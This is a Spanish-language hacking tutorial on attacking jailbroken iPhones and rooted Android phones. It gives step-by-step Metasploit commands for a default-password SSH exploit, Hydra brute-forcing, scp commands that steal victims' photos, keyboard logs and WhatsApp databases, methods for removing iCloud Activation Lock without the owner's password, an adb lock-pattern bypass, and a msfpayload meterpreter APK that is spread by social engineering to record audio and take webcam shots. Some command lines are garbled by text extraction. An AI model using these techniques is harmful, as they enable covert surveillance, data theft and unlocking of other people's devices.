Gonzalo Snchez Surez - Drummer Wolf 2 Hackeo de dispositivos iOS y Android INTRODUCCIN: Explotando el sistema iOS Hoy en da los telfonos mviles almacenan muchsima informacin nuestra, cuentas de correo, redes sociales, historial de internet... Ha habido casos muy sonados de famosos a los que les han robado fotos ntimas de sus smartphones y las han subido a Internet sin que las vctimas se dieran cuenta de nada. Hay ms mtodos, pero lo que vas a encontrar aqu podra ser perfectamente una tcnica vlida para llevar a cabo eso. En este paper simplemente quiero demostrar lo peligroso que es estar conectado a una red Wifi con un dispositivo iOS con OpenSSH activado. Para llevar a cabo este ataque necesitamos dos cosas en el dispositivo vctima: . 1- Que tenga jailbreak . 2- Que tenga instalado OpenSSH, la mayora de la gente que ha realizado jailbreak lo tiene instalado por comodidad. El gran problema: OpenSSH sin configurar. Mucha gente, sobre todo gente no muy familiarizada con el mundo de la seguridad informtica, se olvida de algo muy, muy importante que es cambiar la contrasea por defecto (es lo ms bsico, aunque hacer slo eso no te garantiza ser inmune a un ataque. Datos por defecto del OpenSSH: Usuario: root Password: alpine A esto hay que sumarle que por defecto OpenSSH se queda activado cuando se activa el Wifi. Mucha gente lo instala y se le olvida que lo tiene ah. Eso es muy peligroso y va a ser la base de nuestro ataque. Ya se podrn imaginar todo lo que podemos hacer entrando a un dispositivo iOS con privilegios de super-usuario ;)
Gonzalo Snchez Surez - Drummer Wolf 3 Hackeo de dispositivos iOS y Android TEMA 1. Expl ot ando v ul ner abi l i dad al SSH de un i Dev i ce con Jai l br eak
Herramientas a utilizar: -Consola -Metasploit -SQLiteManager -Nmap o Zenmap -Fing app (iOS o Android) -SSH Dispositivo con el que se realizar la prueba: -iPhone 5s (iOS 7.0.4)
Gonzalo Snchez Surez - Drummer Wolf 4 Hackeo de dispositivos iOS y Android 1.Escaneando la red. Para poder identificar si dentro de nuestra red se encuentra conectado un dispositivo iOS al que podamos intentar vulnerar necesitaremos hacer un escaneo de la misma, para lo cual podemos usar aplicaciones conocidas como escneres de red. Haremos un escaneo con 2 herramientas muy tiles para nuestro propsito. Empezaremos con un programa llamado Zenmap, que es la GUI del conocido Nmap. (disponible para Windows, mac y Linux)
Gonzalo Snchez Surez - Drummer Wolf 5 Hackeo de dispositivos iOS y Android Haremos un escaneo con deteccin de sistema operativo, para lo cual seleccionaremos la opcin de Quick scan plus, en el campo target colocaremos los 2 primeros octetos de nuestra direccin IP, y reemplazaremos los 2 octetos que seguiran por asteriscos (esto para poder tener un escaneo exitoso de la red local y asignarle el rango que va a tener que escanear el programa).
Por lo general este tipo de escaneos tiende a ser un poco tardado, slo es cuestin de ser paciente y dejar que el programa haga lo suyo. Una vez terminado el escaneo, encontramos que hay un dispositivo con iOS dentro de nuestra red y que aparte est con el puerto 22 abierto corriendo el servicio de Open SSH. QUE SUERTE! :D
Gonzalo Snchez Surez - Drummer Wolf 6 Hackeo de dispositivos iOS y Android Como alternativa a Zenmap (Nmap) podramos usar una app llamada Fing la cual est disponible tanto en la App Store como en la Google Play Store, la cual con solo un toque empezar a escanear nuestra red local en busca de todos los dispositivos conectados a la misma. De igual forma podremos encontrar los dispositivos iOS que estn conectados. ANDROID iOS
Gonzalo Snchez Surez - Drummer Wolf 7 Hackeo de dispositivos iOS y Android Una vez que tenemos nuestro target que encontramos gracias a los escaneos procederemos a utilizar el framework metasploit para intentar vulnerar el Open SSH del dispositivo.
2. Vulnerando con metasploit
Iniciamos el framework metasploit:
Hackeo de dispositivos iOS y Android
Gonzalo Snchez Surez - Drummer Wolf 8 Hackeo de dispositivos iOS y Android Utilizaremos el siguiente exploit: msf > use exploit/apple_ios/ssh/cydia_default_ssh Lo configuraremos mediante los siguientes comandos: msf exploit(cydia_default_ssh) > show payloads msf exploit(cydia_default_ssh) > set PAYLOAD generic/shell_reverse_tcp msf exploit(cydia_default_ssh) > set LHOST [MI DIRECCIN IP] msf exploit(cydia_default_ssh) > set RHOST [DIRECCIN IP DE LA VCTIMA] msf exploit(cydia_default_ssh) > show options (revisamos los ajustes del comando antes de lanzarlo
Gonzalo Snchez Surez - Drummer Wolf 9 Hackeo de dispositivos iOS y Android Una vez que todo est listo lanzamos el exploit: msf exploit(cydia_default_ssh) > exploit
Podemos observar que tuvimos un login exitoso con la contrasea alpine Lo siguiente ser acceder al ssh del dispositivo mediante la terminal con el siguiente comando: ssh root@10.210.16.103 Nos pedir la contrasea para el usuario root, la cual sabemos que es alpine y una vez dentro pondremos en la consola pwd para saber donde estamos situados:
CRACKEANDO PASSWORD OPENSSH Seguro que muchos se preguntarn, y si la vctima ha cambiado la contrasea por defecto? Si la contrasea ha sido cambiada an no est todo perdido, podemos intentar sacarla mediante un ataque por fuerza bruta. Si no se ha configurado correctamente OpenSSH (cosa que slo hacen una minora muy reducida de usuarios, seguramente por desconocimiento o simplemente por no complicarse la vida), es posible sacar las contraseas por fuerza bruta ya que por defecto OpenSSH tiene comentada la directiva #MaxAuthTries 6 (/etc/ssh/sshd_config) lo que nos viene a decir que un ataque por fuerza bruta es viable porque el nmero de intentos de login no est limitado.
Gonzalo Snchez Surez - Drummer Wolf 10 Hackeo de dispositivos iOS y Android Para ello podemos usar aplicaciones como Hydra aunque si la contrasea es robusta ser muy difcil de sacar. A continuacin se har un ataque de fuerza bruta al ssh del dispositivo iOS Para el ataque usaremos una herramienta llamada hydra en un versin GUI llamada xhydra, en este caso usaremos la distribucin Kali Linux. 1. Abrimos el programa teclando xhydra en la consola
2. Procedemos a configurar la primer ventana del programa introduciendo la ip vctima, el puerto, el protocolo y que muestre los intentos (opcional).
Gonzalo Snchez Surez - Drummer Wolf 11 Hackeo de dispositivos iOS y Android 3. En la pestaa PASSWORDS configuraremos el nombre de usuario que en este caso es root y la ruta del archivo de diccionario que usaremos para el ataque.
4. Las siguientes pestaas las dejaremos tal y como estn y enseguida nos dirigiremos a la pestaa de START y lanzaremos el ataque, si este llega a ser exitoso con algn password de la lista que utilizamos el programa nos lo indicar de inmediato.
Gonzalo Snchez Surez - Drummer Wolf 12 Hackeo de dispositivos iOS y Android 3. Postexplotacin Una vez estando dentro del dispositivo vctima podremos hacer muchas cosas. Dentro de este curso daremos un recorrido rpido por las acciones ms comunes que se podran realizar desde un punto de vista de un hacker malicioso. Tecleando help dentro de la consola nos aparecern una serie de comandos que podremos usar dentro de nuestro dispositivo, sin embargo, no vamos a profundizar en cada uno de ellos ya que es una lista larga.
Gonzalo Snchez Surez - Drummer Wolf 13 Hackeo de dispositivos iOS y Android -Reiniciar el springboard (explorador de archivos por defecto)
-Reiniciar el dispositivo
Mediante estos comandos se reiniciar el explorador de archivos por defecto de iOS o el dispositivo mismo, segn sea el caso. Lo cual despus de realizar provocar que el dispositivo se vea algo mas o menos as.
Configurando el SSH: Para hacer esta documentacin mas completa incluir a continuacin una forma rpida de activar ese servidor en la distribucin Kali Linux y Mac OS X ya que esta herramienta nos servir para extraer los archivos del dispositivo vulnerado. OK, empecemos con la configuracin del servidor SSH. En mi caso estar usando una mquina virtual de Kali Linux.
Gonzalo Snchez Surez - Drummer Wolf 14 Hackeo de dispositivos iOS y Android Primero necesitars verificar si tu mquina tiene activo algn servicio de SSH activo, para lo cual pondremos el siguiente comando en la consola: root@Kali:~# service --status-all
Si SSH muestra un signo negativo - significa que no est activo o no est instalado
Ahora escribimos root@kali~:# apt-get install openssh-server desde la terminal para instalar el servidor y openssh-client para instalar el cliente
En este caso ya estaba instalado previamente el servidor y el cliente. Para iniciar los servicios SSH pondremos en la consola root@kali~# service ssh start y para checar que el servicio est activo pondremos root@kali~# service ssh status
Gonzalo Snchez Surez - Drummer Wolf 15 Hackeo de dispositivos iOS y Android
Listo, con eso tenemos el servidor SSH funcionando en Kali Linux
-Iniciar el servidor SSH en Mac OS X:
Abriremos Preferencias del sistema, enseguida daremos click en el panel de Compartir y habilitaremos la pestaa de Sesin remota y listo!, el servidor SSH ya est funcionando en tu Mac.
Gonzalo Snchez Surez - Drummer Wolf 16 Hackeo de dispositivos iOS y Android Ahora empezaremos por visitar los directorios interesantes dentro del dispositivo: 1. Fotos y videos Desde la siguiente ruta podemos ver todas las fotos y vdeos almacenados en el dispositivo. /private/var/mobile/Media/DCIM/100APPLE Te gustara robar alguna foto del dispositivo? VAMOS A ELLO! Una vez dentro de la ruta de fotos y videos podremos obtener todos los que queramos simplemente usando el comando para transferencia de archivos mediante SSH como mencionamos anteriormente. Accediendo a la ruta que mencionamos anteriormente, mediante un ls nos mostrar los nombres de los archivos contenidos en la carpeta, en este caso robaremos la ltima foto tomada por el usuario.
Por comodidad abriremos otra ventana de consola y enseguida pondremos el siguiente comando: scp -r [[usuario root del iOS]] @[[direccin ip del ssh de la vctima]]:/ruta/del/archivo/que/queremos/extraer.JPG /ruta/donde/lo/pegaremos
Quedando en este ejemplo algo as: scp -r root@10.210.16.103:/private/var/mobile/Media/DCIM/101APPLE/IMG_1959.JPG /Users/drummerwolf/desktop/hack
Una vez terminada la transferencia revisamos nuestra carpeta de destino donde elegimos guardar la foto y listo, de la misma forma pueden seguir robando mas fotos o videos:
Gonzalo Snchez Surez - Drummer Wolf 17 Hackeo de dispositivos iOS y Android
2. Keylogger Algo muy interesante, iOS almacena en texto plano una especie de registro con las palabras usadas, algo sin duda muy til si estamos en busca de contraseas ;) La ruta donde se encuentra estos archivos es: /private/var/mobile/Library/Keyboard/es_ES-dynamic-text.dat y dentro de ella podremos encontrar los archivos es_ES-dynamic-text.dat y dynamic-text.dat Usaremos el mismo comando del ejemplo pasado para extraer los archivos y veamos que contienen.
Gonzalo Snchez Surez - Drummer Wolf 18 Hackeo de dispositivos iOS y Android Abriendo el archivo con un editor de texto nos muestra en texto plano las palabras que se han escrito desde el teclado del dispositivo (por privacidad esta imagen la puse borrosa)
3. Navegador Web (Safari) En la siguiente ruta podremos encontrar el historial de navegacin de safari y con ello muchos datos que pueden resultar interesantes: /private/var/mobile/Library/Safari/History.plist En versiones recientes de iOS ese archivo ya no se encuentra en esa ruta, sin embargo, an podemos encontrar la base de datos de los marcadores con el nombre de Bookmarks.db
Gonzalo Snchez Surez - Drummer Wolf 19 Hackeo de dispositivos iOS y Android Una vez extraido el archivo segn sea el caso, lo abriremos con un gestos de bases SQLite y observaremos algo as:
4. Base de datos Whats App Mucho ha dado que hablar ltimamente WhatsApp sobre el tema de seguridad y es que WhatsApp almacena la informacin en iOS en una base de datos SQLite que se encuentra en la siguiente ruta con lo que cualquiera podra ver con quin hemos chateado, lo que hemos escrito etc. Para abrir la base de datos he utilizado SQLite Manager.
/private/var/mobile/Applications/(cadena que vara)/Documents/ChatStorage.sqlite *Lo que se refiere a la cadena que vara es un valor alfanumrico que el sistema le asigna a las carpetas que contienen a las aplicaciones, guardndolas de esta forma dentro del sistema y no con sus nombres originales* En este caso la cadena que corresponde a la carpeta donde est la app de whats app (en el caso de mi dispositivo) es la siguiente: C09C0065-B57C-4DF7-BB4A-6A397EA72474
Gonzalo Snchez Surez - Drummer Wolf 20 Hackeo de dispositivos iOS y Android
Y aqu un ejemplo de cmo se ve la base de datos de las conversaciones:
Si seguimos mirando ms tablas podemos ver todo: contactos, nmeros de telfono, mensajes enviados y recibidos, las fechas.... Tambien encontramos que hay otra base sqlite con todos los contactos en la misma ruta pero con el nombre de Contacts.sqlite
Gonzalo Snchez Surez - Drummer Wolf 21 Hackeo de dispositivos iOS y Android Tambin podremos usar una herramienta web para interpretar la base de datos sqlite sin necesidad de tener un programa. En la pgina de http://www.recovermessages.com podremos subir nuestra bd y se generarn las tablas con la informacin correspondiente y lo mejor es que no solo nos sirve para interpretar la base de datos del whatsapp sino tambin las bases de: WhatsApp Android, WhatsApp IPhone, Tuenti IPhone, SpotBros IPhone, Line IPhone, SMS Android, SMS IPhone, EMails Android, EMails IPhone.
Gonzalo Snchez Surez - Drummer Wolf 22 Hackeo de dispositivos iOS y Android 5. Twitter En el siguiente archivo podemos obtener datos datos como nombre de usuario en twitter, ltimas bsquedas y tweets... /private/var/mobile/Applications/(ruta que vara)/Library/Preferences\com.atebits.Tweetie2.plist
Esto es solo un pequeo ejemplo de algunas cosas que podemos ver. Por supuesto hay muchas ms rutas y si las mirsemos todas estaramos aqu un buen rato as que aqu slo les dej algunas de las ms interesantes, si quieren obtener mas, sera cuestin de que ustedes mismos investiguen.
Gonzalo Snchez Surez - Drummer Wolf 23 Hackeo de dispositivos iOS y Android TEMA 2. Borrado de l a cuenta i Cl oud
Mucho se ha hablado sobre la posibilidad de quitar el famoso sistema de seguridad dentro de iOS 7 que consiste en el bloqueo del equipo que corra dicho sistema mediante la cuenta iCloud del usuario dueo. En muchos sitios en internet se especula sobre diversos mtodos y herramientas para lograr burlar o desactivar este bloqueo. En las siguientes pginas se mostrarn algunos de ellos, as como, los bugs dentro de iOS 7 que te permitirn borrar las cuentas de iCloud sin necesidad de usar ningn tipo de tolos.
2. 1 Mtodo hackt i vat e ( compat i bl e ni cament e con i Phone 4)
Este mtodo se basa en la utilizacin de una herramienta que mediante el uso del modo DFU del iPhone 4 se explota una vulnerabilidad en el procesador del dispositivo teniendo la posibilidad de instalarle el servidor ssh y de esa forma borrar los archivos de configuracin donde se encuentra almacenada la cuenta iCloud. Cabe aclarar que este mtodo se realizar dentro del sistema operativo Windows. EMPECEMOS!
1. Debers desactivar tu antivirus & firewall o de lo contrario tu computadora borrar los archivos necesarios para continuar con el proceso. Una vez terminado el desbloqueo si tu gustas puedes desisnstalar la herramienta utilizada sin ningn contratiempo (si no, tu antivirus lo har).
Gonzalo Snchez Surez - Drummer Wolf 24 Hackeo de dispositivos iOS y Android 2. Descarga e instala la tool iOS Soft Dev Pack + JB iOS 7.1 V2 y ejectala. (para realizar la instalacin de la tool es necesario contar con .net framework 3.5 o superior instalado) Seleccionamos
y enseguida seleccionaremos la primera opcin.
3. Conecta tu iPhone en modo DFU (apretando los botones de encendido y home al mismo tiempo durante 10 segundos, soltamos el botn de encendido despus de 2 segundos y seguimos apretando el botn de home durante otros 30 segundos), despus de esto el programa detectar tu dispositivo e iniciar con la explotacin.
Gonzalo Snchez Surez - Drummer Wolf 25 Hackeo de dispositivos iOS y Android 4. Una vez terminada la explotacin, aparecern unas letras verdes de que fue exitoso, posteriormente sleccionaremos la segunda opcin que se encargar de hacer la coneccin al ssh. (Si por alguna razn al realizar este paso les llega a marcar un error que diga algo como could not moun system simplemente vulvan a dar click a la opcin 2.)
5. Procedemos a dar click en la opcin 3 para ejecutar la hacktivate tool
Gonzalo Snchez Surez - Drummer Wolf 26 Hackeo de dispositivos iOS y Android 6. Una vez terminado el proceso anterior el iPhone se pondr en modo de recuperacin y solo tendrn que pulsar la opcin 4 para salir del mismo.
Como una recomendacin les aconsejo desinstalar la herramienta utilizada para todo el proceso. Si realizaron todos los pasos correctamente ahora podrn configurar su iPhone como si fuera un dispositivo nuevo, Felicidades!!!
Gonzalo Snchez Surez - Drummer Wolf 27 Hackeo de dispositivos iOS y Android Uno de las consecuencias conocidas por la realizacin del mtodo hacktivate es que el iPhone se quedar sin la posibilidad de conectarse a las redes celulares. Algn precio se tena que pagar por semejante activacin, no todo es miel sobre hojuelas.
2.2 Borrado de cuenta iCloud mediante bug en iOS versiones 7.0.4 7.0.6 y 7.1 (compatible con iPhone 4,4s,5 y 5s)
Muchas veces me han preguntado si es posible borrar la cuenta iCloud de un iPhone sin necesidad de la contrasea y si este no tiene algn patrn de bloqueo o no se ha intentado restaurar anteriormente. La respuesta es SI, si por azares del destino te llegaron a vender un iPhone y el dueo anterior no le borr su cuenta de iCloud pero te lo dej sin patrn de desbloqueo ser posible para ti explotar esta vulnerabilidad dentro de iOS 7.0.4 , 7.0.6 y 7.1
-Borrando cuenta iCloud en iOS 7.1 en iphone 4 y 4s
Nos dirigiremos a configuracin y posteriormente a la pestaa de iCloud No es un mtodo fcil de reproducir, ya que hay que sincronizar la peticin de "borrar cuenta" junto con el botn de Deshabilitar Find My iPhone al mismo tiempo. Una vez que se pida la contrasea, es necesario apagar y volver a encender el dispositivo. Una vez hecho esto, se podr borra la cuenta de Apple iCloud sin contrasea. Se detalla un poco en las capturas a continuacin.
Gonzalo Snchez Surez - Drummer Wolf 28 Hackeo de dispositivos iOS y Android Como se menciona en el texto anterior, se tiene que seleccionar al mismo tiempo las opciones de desactivar Find my iPhone y Delete Account
Posteriormente aparecer una pantalla como esta donde parecieran estar amontonadas las opciones de desactivar Find my iPhone con la de borrar la cuenta iCloud, felicidades, si te apareci algo como esto lo nico que tienes que hacer es reiniciar el dispositivo, (en este punto podremos notar que la opcin de Find my iPhone ya se encuentra desactivada) nos dirigiremos de nuevo a la configuracin de iCloud y ahora seleccionaremos Eliminar cuenta si lo notas ahora no nos pedir la contrasea de la cuenta iCloud para eliminarla e incluso la medida de seguridad conocida como Activation Lock tambin desaparecer.
Gonzalo Snchez Surez - Drummer Wolf 29 Hackeo de dispositivos iOS y Android -Borrando cuenta iCloud en iOS 7.0.6 en iphone 5, 5c y 5s Accedemos a la configuracin del dispositivo y en la pestaa de iCloud, este glitch es algo complicado de reproducir, se requiere que primero deslices con el dedo la opcin de desactivar Find my iPhone y sin soltarlo aprietes el botn de borrar cuenta, algo as.
El botn del switch se quedar a medias
Posteriormente presionaremos Delete Account, enseguida Delete otra vez, muy importante, durante la animacin en la que aparece la segunda opcin para confirmar el borrado de la cuenta es necesario mover el switch de find my iPhone como si lo fueramos a DESACTIVAR, y una vez presionado Delete from My iPhone hacer lo mismo. Cuando el sistema te pida la contrasea daremos en cancel y si hiciste bien el procedimiento ahora el switch de Find my iPhone quedar parcialmente desactivado
Gonzalo Snchez Surez - Drummer Wolf 30 Hackeo de dispositivos iOS y Android Lo siguiente que tendremos que hacer ser entrar a la pestaa de la cuenta iCloud donde se encuentra el correo y la contrasea. Borraremos el password y la palabra iCloud y apretaremos en done, nos mandar un mensaje de error y repetiremos este procedimiento 2 veces en total. Una vez terminado daremos en cancel
Enseguida volveremos a entrar a esa pestaa y escribiremos en el espacio que qued en blanco la palabra iCloud y listo, cuando quieran borrar la cuenta iCloud del dispositivo no deber ser necesario introducir la contrasea.
Gonzalo Snchez Surez - Drummer Wolf 31 Hackeo de dispositivos iOS y Android -Borrando cuenta iCloud en iOS 7.0.4 en iphone 4, 4s, 5, 5c y 5s
Accedemos a la configuracin del dispositivo y en la pestaa de iCloud accedemos a los datos de la cuenta, borramos el password y tecleamos cualquier palabra, apretamos done, cuando nos aparezca el mensaje de contrasea incorrecta daremos en OK y enseguida en Cancel
Volvemos a entrar a la pestaa per ahora borraremos la palabra iCloud y dejaremos el espacio en blanco, una vez que apretemos done podremos observar que el switch de Find my iPhone estar desactivado y que incluso podremos borrar la cuenta iCloud sin necesidad de la contrasea
Gonzalo Snchez Surez - Drummer Wolf 32 Hackeo de dispositivos iOS y Android MODULO 2: Hackeo de dispositivos Android
Tema 1: Bypass al patrn de desbl oqueo
Herrami entas a uti l i zar: -adb bundl e -consol a
Di sposi ti vo en el que se real i zar l a prueba: -Xperi a Pro mk16a ( androi d 4. 0. 4 con root)
Gonzalo Snchez Surez - Drummer Wolf 33 Hackeo de dispositivos iOS y Android En este mdulo se detallar como lograr un bypass al patrn de desbloqueo de un mobil con android. Un requisito para que este mtodo sea exitoso es que el mobil est rooteado y tenga el debbuging mode encendido. Por lo general hay un gran porcentaje de personas que al hacerle root a sus dispositivos dejan el modo debugging encendido y lo olvidan por completo, esto puede representar una amenaza (o una ventaja) dependiendo del uso que le quieran dar a este mtodo, ya sea para saltarse el patrn de desbloqueo en caso de que lo hayan olvidado o para saltrselo en caso de ser una persona con malas intenciones hacia el dispositivo. Primero instalaremos el adb de android que es la herramienta utilizada por los desarrolladores de la plataforma para diferentes propsitos, en este caso, nos enfocaremos en borrar los archivos que contienen la informacin correspondiente al patrn de bloqueo.
1. 1 I nstal aci n de adb bundl e
Kal i Li nux: Para instalar adb bundle dentro de kali Linux tendremos que descargar el paquete desde la web oficial http://dl.google.com/android/adt/22.6.2/adt-bundle-linux-x86_64-20140321.zip y descomprimirlo, de preferencia lo dejaremos en la carpeta inicial del sistema, en mi caso lo puse en /root Posteriormente tendremos que instalar unos paquetes necesarios para que lo podamos ejecutar sin problemas, abrimos terminal y teclearemos lo siguiente:
A estas alturas ya debes poder ejecutar el software sin problemas, sin embargo, para facilitarnos la vida crearemos las variables de entorno para ejecutar el software sin importar la ruta en la que estemos situados, para lo cual teclearemos el siguiente comando en la consola:
Gonzalo Snchez Surez - Drummer Wolf 34 Hackeo de dispositivos iOS y Android
IMPORTANTE: La ruta puede variar dependiendo en donde hayan descomprimido el archivo, revisen muy bien la ruta de su carpeta de platform-tools para que las variables de entorno sean creadas correctamente.
Mac osx:
Descargaremos el paquete oficial desde la web de android http://dl.google.com/android/adt/22.6.2/adt-bundle-mac-x86_64-20140321.zip , de igual forma lo descomprimiremos dentro de nuestra carpeta de usuario, en este caso la ma es /Users/drummerwol f /androi d
Crearemos nuestra variables de entorno: 1. Primero debemos crear un fichero para el usuario actual. Para ello abrimos el terminal y nos posicionamos en la carpeta Home. (/Users/XXX/) Una vez dentro ejecutamos el siguiente comando:
touch .bash_profile
Esto nos generar un fichero con el mismo nombre. Ahora abrimos el fichero con el editor de texto, para ello ejecutamos el siguiente comando:
open -e .bash_profile
Aqu agregamos la ruta a nuestro adb dentro del directorio de nuestro paquete de android descargado anteriormente:
Esto nos permitir utilizar el comando adb, desde cualquier sitio en Terminal. Ahora reiniciamos las variables de entorno con:
source .bash_profile
Gonzalo Snchez Surez - Drummer Wolf 35 Hackeo de dispositivos iOS y Android Hecho!, ya tenemos nuestra variable de entorno agregada. Para comprobarlo ejecuta:
echo $PATH
Ah estarn.
Wi ndows: Descargamos el paquete oficial en el link http://developer.android.com/sdk/index.html?hl=sk#win-bundle seleccionamos nuestro paquete correspondiente a la arquitectura de nuestro procesador si este es de 32 o 64 bits. Lo descomprimimos y renombramos la carpeta a algo mas simple como androi d esto nos facilitar ms el crear nuestras variables de entorno. Una vez teniendo la carpeta la moveremos al directorio raz de nuestra unidad de disco duro, en este caso mi ruta sera C: Nos dirigiremos a men de inicio: click derecho en equi po>propi edades conf i guraci n avanzada del si stema
cl i ck en vari abl es de entorno
Gonzalo Snchez Surez - Drummer Wolf 36 Hackeo de dispositivos iOS y Android En l a caj a i nf eri or buscaremos l a vari abl e Path y edi tar
En el cuadro en l a opci n de Val or de l a vari abl e nos posi ci onaremos al f i nal de l a l nea y aadi remos el si gui ente texto:
;C:\android\sdk\platform-tools
Damos click en aceptar y LISTO, ahora puedes teclear los comandos de adb dentro de smbolo del sistema sin ningn problema.
Gonzalo Snchez Surez - Drummer Wolf 37 Hackeo de dispositivos iOS y Android 1. 2 Bypass al patrn de desbl oqueo de androi d usando adb
1. Primero verificaremos que nuestro equipo sea reconocido tecleando adb devi ces una vez que hayamos conectado nuestro equipo a la computadora mediante el cable usb.
2. Iniciaremos una Shell en el dispositivo tecleando adb Shel l y enseguida tecleamos su para tener permisos de superusuario.
3. Nos dirigiremos a la ruta /data/system/ y una vez ah dentro podremos observar que existen varios archivos, entre ellos se encuentra el que contiene la configuracin del patrn de desbloqueo, este archivo puede llamarse gesture.key o ( l ocksetti ngs.db, l ocksetti ngs.db-wal y l ocksetti ngs.db-shm) lo que haremos ser borrarlo con el comando rm y enseguida el nombre y extensin del archivo.
Gonzalo Snchez Surez - Drummer Wolf 38 Hackeo de dispositivos iOS y Android
4. Reiniciamos el dispositivo tecleando reboot
5. Listo, el patrn de desbloqueo ha sido borrado y una vez reiniciado el dispositivo basta con que hagas un toque en la pantalla de desbloqueo o simplemente deslices tu dedo y tendrs acceso al dispositivo.
Gonzalo Snchez Surez - Drummer Wolf 39 Hackeo de dispositivos iOS y Android Tema 2: Ataque a di sposi ti vos Androi d con metaspl oi t
En este tema haremos una explotacin a un dispositivo Android por medio de una aplicacin (.apk) creada mediante el framework de metasploit.
1. Iniciamos abriendo nuestra consola de Metasploit
2. Verificamos los exploits y mdulos disponibles teclando search androi d :
Si contamos con los payloads correspondientes a android podremos continuar, de lo contrario necesitaremos actualizar metasploit. Enseguida empezaremos el procedimiento para crear un .apk con infeccin para obtener una Shell meterpreter de manera local y remota.
Gonzalo Snchez Surez - Drummer Wolf 40 Hackeo de dispositivos iOS y Android
1.-Entramos en la carpeta de instalacin de metasploit , en este caso la ruta de instalacin en mi computadora es la siguiente /opt/msf.
2. Tengamos en cuenta los datos de conexin que usaremos para la creacin de nuestra .apk.
I DLL A1ACAN1L : 10.210.4S.38 (m| |p) ULk1C A1ACAN1L : 6789 3. Una vez en la carpeta de instalacin de Metasploit usaremos el siguiente comando
./msfpayload androld/meLerpreLer/reverse_Lcp LPCS1=l_LCCAL/nC-l LC81=uL81C 8 > /8u1A/nombre_de_la_app.apk" ./msfpayload androld/meLerpreLer/reverse_Lcp LPCS1=10.210.4S.38 LC81=6789 8 > /users/urummerwolf/ueskLop/hack/ hack|ng_mex|co.apk" 4. La .apk ha sido creada
Gonzalo Snchez Surez - Drummer Wolf 41 Hackeo de dispositivos iOS y Android 5. En este caso para la explotacin usaremos un dispositivo Android xperia pro modelo mk16a.
6. Instalacin del .apk infectado Esta es la parte mas esencial para la explotacin, ser necesario que el atacante tenga la suficiente creatividad y sea muy bueno aplicando la ingeniera social. Una de las formas puede ser mandar por correo la aplicacin, convencer a la vctima que con esta aplicacin tendr internet 3g gratis, que esta aplicacin hace mas rpido su dispositivo, etc etc. Incluso si nos furamos mas a fondo podramos hacer la decompilacin de la .apk e introducir su cdigo dentro de alguna otra aplicacin cualquiera, por ejemplo, introducir el cdigo de la .apk infecciosa dentro del cdigo de wifi test auditor (app para sacar claves wifi) subirla a play store o subirla a algn servicio como mega, dropbox etc y difundirla para que esta sea instalada pensando que es como cualquier otra app inofensiva. Este paso lo dejar a la creatividad y habilidad del lector.
Gonzalo Snchez Surez - Drummer Wolf 42 Hackeo de dispositivos iOS y Android 7. El proceso de instalacin de la .apk infectada ser como el de cualquier otra aplicacin.
8. Continuamos Posicionados en la carpeta de instalacin y procedemos a ejecutar el siguiente comando. !"#$%&'() +,-(.)/#$0(/)#1234(+5 6789:7;<2345.)4#$+/+5-5+/+5#5+=+5%+>/'- 9?:@A<!"#$%&'$()%*!" 96:BA<",-./% C ! !"#$%&'() +,-(.)/#$0(/)#1234(+5 6789:7;<2345.)4#$+/+5-5+/+5#5+=+5%+>/'- 9?:@A<012301245267 96:BA<897: C ! (Si la app fue ejecutada dentro del dispositivo infectado debemos tener xito al ejecutar el comando)
Para darnos una idea de lo que podemos ejecutar dentro de la Shell meterpreter teclearemos el comando hel p
Gonzalo Snchez Surez - Drummer Wolf 43 Hackeo de dispositivos iOS y Android meterpreter > help Core Commands =============
Command Description ------- ----------- ? Help menu background Backgrounds the current session bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information about active channels close Closes a channel disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session help Help menu info Displays information about a Post module interact Interacts with a channel irb Drop into irb scripting mode load Load one or more meterpreter extensions quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module use Deprecated alias for 'load' write Writes data to a channel
Stdapi: File system Commands ============================
Command Description
Gonzalo Snchez Surez - Drummer Wolf 44 Hackeo de dispositivos iOS y Android ------- ----------- cat Read the contents of a file to the screen cd Change directory download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory lpwd Print local working directory ls List files mkdir Make directory pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files upload Upload a file or directory
Command Description ------- ----------- ifconfig Display interfaces ipconfig Display interfaces portfwd Forward a local port to a remote service route View and modify the routing table
Stdapi: System Commands =======================
Command Description
Gonzalo Snchez Surez - Drummer Wolf 45 Hackeo de dispositivos iOS y Android ------- ----------- execute Execute a command getuid Get the user that the server is running as ps List running processes shell Drop into a system command shell sysinfo Gets information about the remote system, such as OS
Stdapi: Webcam Commands =======================
Command Description ------- ----------- record_mic Record audio from the default microphone for X seconds webcam_list List webcams webcam_snap Take a snapshot from the specified webcam
Comando "webcam_||st" , para ||star |as cmaras web en e| d|spos|t|vo.
Comando "webcam_snap" , para tomar una foto en t|empo rea| con e| d|spos|t|vo.
Gonzalo Snchez Surez - Drummer Wolf 46 Hackeo de dispositivos iOS y Android
Comando "|fconf|g" , para rev|sar |as |nterfaces de red y |a mac address de| equ|po.
Comando "record_m|c" , para grabar aud|o con e| d|spos|t|vo :
Comando "ps" , para ||star |os procesos que estn corr|endo en e| d|spos|t|vo.
Gonzalo Snchez Surez - Drummer Wolf 47 Hackeo de dispositivos iOS y Android
Comando "|s" , para ||star |os arch|vos. Comando "pwd" , para ver en que carpeta o phat estamos pos|c|onados. Ahora robaremos algunas fotos: Nos pos|c|onamos en |a ruta "]mnt]sdcard]DCIM]100ANDkC" que es donde en este caso m| d|spos|t|vo a|macena |as fotos
Gonzalo Snchez Surez - Drummer Wolf 48 Hackeo de dispositivos iOS y Android Ahora descargaremos una foto a nuestro escr|tor|o med|ante e| comando "down|oad". meLerpreLer > download 01.[pg /users/drummerwolf/ueskLop/hack/ meLerpreLer > download 01.[pg /Lu_/ruLa/
As como robamos la base de datos de whatsapp en el iPhone lo haremos con la de Android, sin embargo, a diferencia de iOS la base de datos almacenada dentro de Android se encuentra encriptada y para eso usaremos un sencillo comando de OpenSSL para poder desencriptarla
Para usuarios de sistemas basados en UNIX es necesario tener OpenSSL instalado: Abrimos una terminal, nos situamos en la ruta donde tenemos nuestro archivo de base de datos con terminacin .crypt y escribimos el siguiente comando
En donde in va a corresponder al nombre del archive de nuestra base que descargamos, -out sera el nombre del archivo que le daremos de salida y K sera la llave universal que se usa para desencriptar la base de datos
